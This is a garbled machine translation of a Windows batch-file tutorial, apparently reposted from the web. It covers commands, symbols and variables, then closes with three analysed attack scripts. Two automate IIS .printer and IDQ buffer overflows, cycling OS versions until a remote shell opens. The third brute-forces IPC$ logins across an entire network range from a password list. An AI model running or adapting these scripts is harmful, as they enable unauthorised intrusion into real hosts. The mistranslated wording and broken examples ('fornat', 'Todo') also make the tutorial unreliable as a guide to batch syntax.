The tutorial is divided into 4 parts, the first part is a batch of special commands, the second part is a special symbol and batch processing, the third part is batch and variable, part four is a complete case. Because the tutorial is relatively long, all in the magazine we will be divided into two series, this issue first published one or two parts, please readers attention.
Part I: Special commands for batch processing
A batch file is a series of commands that are set up in a certain order as an executable text file with the extension bat. These commands are collectively referred to as batch commands, and I would like to introduce you to the order of the batch process.
1. REM
REM is an annotation command is generally used to annotate the program, the content of the command will not be displayed and executed when the program is executed. Cases:
REM What you see now is the annotation, and this sentence will not be executed. What is explained in a later example is that REM is placed behind Rem. Attention, please.
2, ECHO
Echo is a echo command the main parameters are off and on, and the echo message is typically used to display a specific information. Cases:
Echo off
Rem above represents turn off echo without displaying the commands that are executed
Echo is the message.
Rem above represents the column character "This is the message"
Execution results:
C:\>echo. BAT
This is the news.
3, GOTO
Goto is the meaning of jump. Allow ": XXX" to construct a label in batch processing and then use goto: Label directly to perform the order after marking. Cases
: LABEL
REM is the label named label.
DIR C:\
DIR D:\
GOTO LABEL
REM above the program Jump label label to continue execution.
4, call
The call command can invoke another batch during batch execution, and then continue with the original batch when another batch finishes executing. Cases:
Batch processing 2. The bat contents are as follows:
ECHO, this is the 2 content.
Batch processing 1. The bat contents are as follows:
ECHO, this is 1 content.
Call 2.BAT
The contents of ECHO 1 and 2 are all displayed complete
The results of the implementation are as follows:
C:\>1.bat
This is 1 content.
That's 2 of the stuff.
The contents of 1 and 2 show complete
5, PAUSE
PAUSE stops the execution of system commands and displays the following content. Cases:
C:\> PAUSE
Please press any key to continue ...
6, IF
IF condition to judge the statement, the syntax format is as follows:
IF [NOT] ERRORLEVEL number command
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command
Description
[NOT] Returns the returned result as the "if not" meaning.
ERRORLEVEL is the exit value returned after the command execution completes
The number exit value range 0~255. The order of the values should be large and small. If the value returned is greater than or equal to the specified value, the condition is set.
String1==string2 string1 and string2 are both character data, the uppercase and lowercase characters will be treated differently, and the equals number in this condition must be 2 (absolutely equal), and the condition should be followed by the command
EXIST filename is the meaning of the existence of a file or directory.
IF ERRORLEVEL This statement must be placed behind a command. The return value of the command is judged by the if errorlevel after the command is executed.
Cases:
1. IF [NOT] ERRORLEVEL number command
Determine the return value after the test command has been executed.
echo off
Dir z:
REM If the exit code is 1 (unsuccessful) jump to Heading 1 for execution
IF errorlevel 1 goto 1
REM If exit code is 0 (successful) jump to heading 0 to execute
IF errorlevel 0 goto 0
: 0
echo Command executed successfully!
Rem program execution jump to title exit exit
Goto exit
: 1
echo command failed to execute!
Rem program execution jump to title exit exit
Goto exit
: Exit
Rem here is the exit of the program
2. IF string1==string2 Command
Check the value of the current variable to make a judgment
ECHO off
IF%1==2 Goto No
Echo variable Equal!
Goto exit
: No
echo variables are not equal
Goto exit
: Exit
So you can see the effect c:\>test.bat number
3, IF [NOT] EXIST filename command
Find specific files to make judgments
echo off
IF not EXIST Autoexec.bat Goto 1
echo File exists successfully!
Goto exit
: 1
echo file does not exist failure!
Goto exit
: Exit
This batch can be placed in C and D respectively to perform a look at the effect.
7, for
For this command is special is a command to loop through the command, and for the loop inside can also apply for in the loop. In this article we introduce the basic usage of the cycle of no use, and then to explain the applied loop. The order for in the batch is as follows:
For [%%c] in (set) do [command] [arguments]
At the command line, the commands are as follows:
For [%c] in (set) do [command] [arguments]
Common parameters:
/L The set represents a sequence of numbers in increments from start to finish. Therefore, (1,1,5) will produce a sequence of 1 2 3 4 5, (5,-1,1) will produce a sequence (5 4 3 2 1).
/d If the set contains wildcard characters, specifies that the directory name is matched instead of the filename.
/F reads the data from the specified file as a variable
Eol=c-refers to the end of a line comment character (just one)
Skip=n-refers to the number of rows ignored at the start of the file.
Delims=xxx-refers to the delimiter set. This replaces the default delimiter set for spaces and tabs.
Tokens=x,y,m-n-refers to which symbol of each line is passed to the for itself for each iteration. This results in an assignment of the extra variable names. The m-n format is a range. Specify MTH by nth symbol. If the last character in the symbol string is asterisk, the extra variable is allocated and accepts the reserved text of the line after the last symbol resolution.
USEBACKQ-Specifies that the new syntax is used in the following cases: A string that executes a post quote as a command and a single quote character as a literal string command and allows the file name to be extended in filenameset with double quotes.
Here's an example:
For/f "eol=; tokens=2,3* delims=, "%i in (myfile.txt) do @echo%i%j
Each row in the myfile.txt is parsed, the rows preceded by semicolons are ignored, and the second and third symbols in each row are passed to the for program body, with commas and/or space delimited symbols. Notice that this for-body statement refers to%i to get the second symbol, referencing the%j to get the third symbol, and referencing%k to get all the remaining symbols after the third symbol. For file names with spaces, you need to enclose the file name in double quotes. In order to use double quotes in this way, you also need to use the USEBACKQ option, otherwise the double quotes are interpreted as being used to define a string to parse.
%i is specifically described in the For statement,%j and%k are specifically described through the tokens= option. You can specify up to 26 symbols by tokens= line, as long as you do not attempt to describe a variable above the letter ' z ' or ' z '. Keep in mind that the for variable is case-only and is generic, and that no more than 52 are in use at the same time.
You can also use for/f parsing logic on adjacent strings, by enclosing the filenameset between parentheses in single quotes. In this way, the string is treated as a single input line in a file. Finally, you can use the for/f command to parse the output of the command. The method is to turn the filenameset between parentheses into a backslash string. The string is treated as a command line and passed to a child CMD. EXE, its output is captured in memory and used as a file analysis. Therefore, the following example:
for/f "Usebackq delims=="%i in (' Set ') do @echo%i
The name of the environment variable in the current environment is enumerated.
The following is a simple example that will illustrate the difference between the parameter/L and the absence of parameters:
Delete file 1. TXT 2.TXT 3.TXT 4.TXT 5.TXT
Cases:
ECHO off
FOR/L%%f in (1,1,5) Todo DEL%%f.txt
Or
For%%f in (1,2,3,4,5) Todo DEL%%f.txt
The results of the above 2 commands are the same as follows:
C:\>del 1.TXT
C:\>del 2.TXT
C:\>del 3.TXT
C:\>del 4.TXT
C:\>del 5.TXT
8, SETLOCAL
Start localized operations for environment changes in batch files. After the execution of SETLOCAL
The environmental changes made are limited to batch files. To restore the original settings, you must
Line endlocal. When the end of the batch file is reached, the batch file is terminated with each
The SETLOCAL command that has not yet been executed will have an implied endlocal to be
Perform. Cases:
@ECHO off
SET Path/* View environment variable PATH
PAUSE
SETLOCAL
Set path=e:\tools/* Reset environment variable PATH
SET PATH
PAUSE
Endlocal
SET PATH
From the example above we can see that the environment variable path 1th time is displayed as the system default path. is set to E:\TOOLS and displayed as E:\TOOLS but after endlocal we can see that he was restored to the system's default path. But this setting works only when the batch is running. The environment variable path is restored when the batch process completes.
9, SHIFT
The SHIFT command allows the commands on the command to use more than 10 replaceable parameters (%0~%9) above:
ECHO off
ECHO%1%2%3%5%6%7%8%9
SHIFT
ECHO%1%2%3%5%6%7%8%9
SHIFT
ECHO%1%2%3%5%6%7%8%9
The results of the implementation are as follows:
C::\>shift. BAT 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
The above is based on WIN2000 9 batch processing commands.
Part II: Special symbols and batch processing
Some symbols are not allowed at the command line, but some have special meanings.
1, symbol (@)
@ is meant to turn off the echo of the current line in batch processing. We know from the above that the command echo off can turn off the entire batch of commands to echo but not to display the echo off command. Now we're going to add the @ so echo off command before this command is turned back on @ so that all the commands don't come back.
2, symbol (>)
> means to pass and overwrite. His role is to pass the Run-time echo results to the following range (the file is also the default system console) for example:
The contents of file 1.txt are:
1+1
Use the command c:\>dir *.txt >1.txt
The contents of 1.txt are as follows
The volume in drive C does not have a label.
The serial number of the volume is 301a-1508
C:\ The directory
2003-03-11 14:04 1,005 Frunlog. Txt
2003-04-04 16:38 18,598,494 Log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 Aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 Files 18,630,070 bytes
0 Directory 1,191,542,784 Free bytes
> overwrites the results of the command execution to the original file contents.
The program will not have any echoes when passed to the console (note: This echo is not the same concept as echo off.) echo off is the echo of the input command, where the Echo is an example of the echo in the program's execution:
C:\>dir *.txt >nul
The program will not have any display and will not produce any traces.
3, symbol (>>)
The role of symbol >> is similar to symbol >, but their difference is that >> is passed and appended to the end of the file >> can also be passed back to the console (usage ibid.) Example:
The same as in file 1.txt:
1+1
Use the command c:\>dir *.txt >>1.txt
The contents of 1.txt are as follows
1+1
The volume in drive C does not have a label.
The serial number of the volume is 301a-1508
C:\ The directory
2003-03-11 14:04 1,005 Frunlog. Txt
2003-04-04 16:38 18,598,494 Log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 Aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 Files 18,630,070 bytes
0 Directory 1,191,542,784 Free bytes
>> the results of the command execution are appended to the original file contents.
4, Symbol (|)
| is a pipe transfer command means to pass the result of the previous command to the next command to process. Cases:
C:\>dir C:\|find "1508"
The serial number of the volume is 301a-1508
The above command means to find all the C:\ and find 1508 strings. Find's usage Please check it by yourself
This is how I automatically format a platter without using format's automatic formatting parameters.
Echo Y|fornat A:/s/q/v:system
Anyone who has used the format command knows that the format has an interactive process in which the user enters Y to determine whether the current command is being executed. Add echo y to the command and use the pipe transfer character | To pass the echo's result y to format for the purpose of manually entering Y (this command is dangerous, be careful when testing)
5. Symbol (^)
^ is a leading character for special symbols >, <, &. In the order he removed the special kinetic energy of the above 3 symbols only as a sign instead of using their special meaning. Cases:
C:\>echo Test ^> 1.txt
Test > 1.txt
As you can see from the above, the test is not written to the file 1.txt but the test >1.txt is displayed as a string. This symbol works well when you build batches remotely.
6, Symbol (&)
The & symbol allows you to use more than 2 different commands on a single line, and the execution of the 2nd command will not be affected when the first command fails. Cases:
c:\> dir z:\ &dir y:\ &dir c:\
The above command will continuously show Z:y: C: The contents of the disk ignore the existence of the letter.
7, symbol (&&)
The && symbol also allows you to use more than 2 different commands on a single line, and subsequent commands will no longer be executed when the first command fails. Cases:
c:\> dir z:\ &&dir y:\ &&dir c:\
The above commands will prompt you to check for the existence of Z: Disk if present, execute, and stop all subsequent commands if they do not exist
8. Symbol ("")
The symbol allows spaces to be included in the string. To enter a special directory you can use the following method Example:
C:\>CD "Program Files"
C:\>CD progra~1
C:\>CD pro*
All of the above methods can be entered into the Program Files directory
9, symbol (,)
, the symbol is equivalent to a space. It can be used in some special cases instead of spaces. Cases:
C:\>dir,c:\
10. Symbol (;)
; symbols can be used for different purposes when the command is the same; isolated but performed unchanged. If an error occurs during execution, only the error report is returned but the program continues to execute. Cases:
DIR c:\;D: \; E:\f:\
The above command is equivalent to
DIR C:\
DIR D:\
DIR e:\
DIR f:\
Of course there are some special symbols, but their use of the area is very small no longer here to explain.
Part III: Batch processing and variables
The appropriate reference variables in the batch process will make your program more widely applied. A total of 10 variables can be processed per batch from%0~%9. Where%0 is used by default to the file name of the batch. %0 cannot be replaced by% 1 unless you use the shift command. Example of a reference to the shift command if you add a%0 to the front of%1, the result is as follows:
C::\>shift. BAT 1 2 3 4 5 6 7 8 9 10 11
SHIFT. BAT 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
How the system distinguishes each variable, the system distinguishes between the rules of the variable and the space in the middle of the string, that is, whenever a space is found, the character preceding the space is treated as a variable and the character following the space is used as another variable. If your variable is a long directory name with a space in it you need to circle it with the quotes in the last section of special symbol 8. Cases:
The batch content is:
ECHO%1
ECHO%2
ECHO%3
Enter command:
C:\>test "Program Files" program Files
Program Files
Program
Files
More than 10 variables that may be used concurrently in a complex batch will be conflicting with the system's rules. So how is this problem solved? There is also a variable in the system called an environment variable (using the SET command to view the current system's environment variables) such as the current system directory is%windir% or%systemroot%. When more than 10 parameters are used at the same time, we can save some variables that are called in later programs as environment variables. Specific usage such as SET a=%1 so we named a new environment variable A in the call to variable A to%a% this call, the environment variable is not affected by the shift command. If you want to change an environment variable, you need to reset it to change it. Of course, you can also transfer between variables and variables to achieve the goal. Let's take a look at an example of the batch processing as follows:
ECHO off
SET pass=%1
SHIFT
SET pass1=%1
SHIFT
ECHO%pass%%pass1%%1%2%3%5%6%7%8%9
SHIFT
ECHO%pass%%pass1%%9
The transfer of SET pass=%pass1% variable
SET pass1=%9
SHIFT
ECHO%pass%%pass1%%9
Using commands: C:\>test A B 3 4 5 6 7 8 9 K L
A B 3 4 5 6 7 8 9 K Note: This line shows 11 variables
A B l after using 3 shift,%9 becomes L.
The result of the transfer of the B L variable
Part IV: Complete case
These are some of the uses of batch processing. Now we combine these usages to analyze some of the batches currently posted online to see how they work. Here I will enumerate three examples for detailed analysis, in order to keep the program complete my comments will be appended to/*.
Example One
This example is a batch that uses Iis5hack.exe to overflow a host with a. Printer vulnerability. The use of the program has Iis5hack.exe and the system with the Telnet.exe. The iis5hack command format is:
Iis5hack < target ip> < target port > < target version > < overflow connection port > target version 0-9 these 10 numbers correspond to the different language versions and the SP's system versions respectively, and the batch process that we compile uses the format of the command <iis.bat Target IP (start version number) > start version number is optional. The procedure is as follows.
@echo off/* Turn off command echo
If "%1%" = "goto help/*" Determine if%1 is null,%1 is the destination IP
If "%2%" = = "1" Goto 1/* Determine if%2 is 1, 1 is a jump flag 1
If "%2%" = = "2" Goto 2/*%2 is the start version number, if not set then
If "%2%" = = "3" GOTO 3/* If present, start execution from match
If "%2%" = = "4" Goto 4
If "%2%" = = "5" Goto 5
If "%2%" = = "6" Goto 6
If "%2%" = = "7" Goto 7
If "%2%" = = "8" Goto 8
If not EXIST iis5hack.exe goto File/* No iis5hack.exe is found to execute the contents of the Flag file section
Ping%1-n 1 | Find "Received = 1"/*ping target 1 times, from the results found Received = 1
if errorlevel 1 goto error/* If the return code is 1 then the error segment is executed (code 1 is not found 0 is found and executed successfully)
Iis5hack%1 80 9 88 | Find "good"/* start overflow target port 80 system code 9 overflow after connection port 88 found the string "good" in execution results (only string good if overflow succeeds)
If not errorlevel 1 goto telnet/* If no error code 1 (overflow succeeds) executes the contents of the Telnet segment.
echo OS type 9 failed! /Otherwise show this sentence
: 8/* The following code content referenced above
Iis5hack%1 80 8 88 | Find "Good"
If not errorlevel 1 goto telnet
echo OS type 8 failed!
: 7
Iis5hack%1 80 7 88 | Find "Good"
If not errorlevel 1 goto telnet
echo OS type 7 failed!
: 6
Iis5hack%1 80 6 88 | Find "Good"
If not errorlevel 1 goto telnet
echo OS type 6 failed!
: 5
Iis5hack%1 80 5 88 | Find "Good"
If not errorlevel 1 goto telnet
echo OS type 5 failed!
: 4
Iis5hack%1 80 4 88 | Find "Good"
If not errorlevel 1 goto telnet
echo OS Type 4 failed!
: 3
Iis5hack%1 80 3 88 | Find "Good"
If not errorlevel 1 goto telnet
echo OS Type 3 failed!
: 2
Iis5hack%1 80 2 88 | Find "Good"
If not errorlevel 1 goto telnet
echo OS type 2 failed!
: 1
Iis5hack%1 80 1 88 | Find "Good"
If not errorlevel 1 goto telnet
echo OS Type 1 failed!
: 0
Iis5hack%1 80 0 88 | Find "Good"
If not errorlevel 1 goto telnet
echo OS type 0 failed!
Goto Error
: Telnet
Telnet%1 88/* 88 port to start connecting to destination IP
Goto Exit/* Link interrupted after jump exit segment
: The error/*error section displays help information after errors
Echo may not be able to connect to the network or the other side to fix the vulnerability! Please try the manual once in the following format!
: File/*file section shows information not found in files
echo file Iis5hack.exe not found! Program Abort Run!
Goto Exit/* Jump exit Segment
: The Help/*help section shows the use format for this batch
echo This procedure uses the following:
echo IIS [Destination IP]
echo IIS [Destination IP] [start number 9-0]
: Exit/*exit Program exit
This batch basically does not have any loops just to walk down the road. So the code is relatively long difficult!
Case II
This example is a batch of overflow for a machine with a IDQ vulnerability using Iisidq.exe. The program used has the Iisidq.exe and the system to bring the program Telnet.exe. The use of Iisidq.exe is as follows:
Run Parameters: Operating system Type Destination address Web port 1 Overflow listening Port < input command 1>
In which, if the input command parameter is not entered, then the default is: "cmd.exe".
The code range for the operating system type type is 0-14. Our batch process uses the command format for the <idq.bat target ip> program as follows:
@echo off//* Same Example one
If not EXIST iisidq.exe goto file/* Same Example one
If%1 = = "" Goto error/* Same example one
Ping%1-n 1 | Find "Received = 1"/* Same Example one
if errorlevel 1 goto error1/* Same Example one
Set b=%1/* Creates an environment variable B that passes the contents of the variable%1 to environment variable B. The content of variable B will be the target IP later
Set a=0/* Creates an environment variable A and specifies that environment variable a is 0. A counter is used for a loop that uses the entire batch process.
: No/*no section begins
If%a%==0 set d=0/* If environment variable A=0 creates environment variable D to set environment variable d=0.
If%a%==1 set d=1/* environment variable D is actually the operating system type code, using counters to control its
If%a%==2 set d=2/* change.
If%a%==3 set d=3
If%a%==4 set d=4
If%a%==5 set d=5
If%a%==6 set d=6
If%a%==7 set d=7
If%a%==9 set d=9
If%a%==10 set d=13
If%a%==11 set d=14
Goto 0/* Variable transfer completed, go to flag 0 run
: 1
Echo is performing the%d%! Cannot connect to target%b%! Trying to connect please wait ...
: 0/* Flag 0 start
IISIDQ%d%%b% 1 |find "good"/* Send overflow command in format and find string good in result (sending code succeeds to have string good)
if errorlevel 1 goto 1/* If no good string is not sent to jump
/* Turn flag 1 continue to try to send
Ping 127.0.0.1-n 8 >nul/*ping itself 8 times the equivalent delay 8 seconds does not show hold
/* Line Result
Echo is performing the%d%! /* Reporting operating system types that are overflowing
Telnet%b% 99/* Connection Overflow port
Echo. /* Displays a blank line
If%d%==14 goto error1/* If the operating system type is 14 then jump Error1 (Recycle exit)
If%d%==13 set a=11/* Start attaching a counter to the operating system code again
If%d%==9 set a=10
If%d%==7 set a=9
If%d%==6 set a=7
If%d%==5 set a=6
If%d%==4 set a=5
If%d%==3 set a=4
If%d%==2 set a=3
If%d%==1 set a=2
If%d%==0 set a=1
Goto No/* Attached value complete jump no paragraph execution
: File//Below are the Help tips after an error
Echo IIsidq.exe didn't find it! Put the file in the same directory as this file!
Goto exit
: Error
echo Error! Destination IP not recognized! Please use the following format to connect!
echo idq [Destination IP]
Goto exit
: Error1
The echo connection did not succeed! Perhaps the target machine has patched up the vulnerability or network failure!
echo Please try it manually in the following format!
This batch process is mastered by the overall cycle of the batching unit, mastering the Counter section.
Example Three
FOR/L%%a in (0,1,255) does for/l%%b in (0,1,255) does for/l%%c in (1,1,254) do for/f ' tokens=1,2* '%%e in (userpass.txt ) do net use \\%1.%%a.%%b.%%c\ipc$%%e/u:%%f
The above command is 1 commands. You can see that the command uses 4 for to apply. The usage is: c:\>test. BAT 218 When you enter 218 back, the command will be the 1th for the initial value of 0 for%%a then continue to take the 2nd for the initial value of 0 for%%b continue to take the 3rd for the initial value of 1 for the%%c the last for is the first paragraph in the userpass.txt as a password% E The second segment of the character as the username%%f the last command (here I bring the values above, set the password to 123 user name is ABC)
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.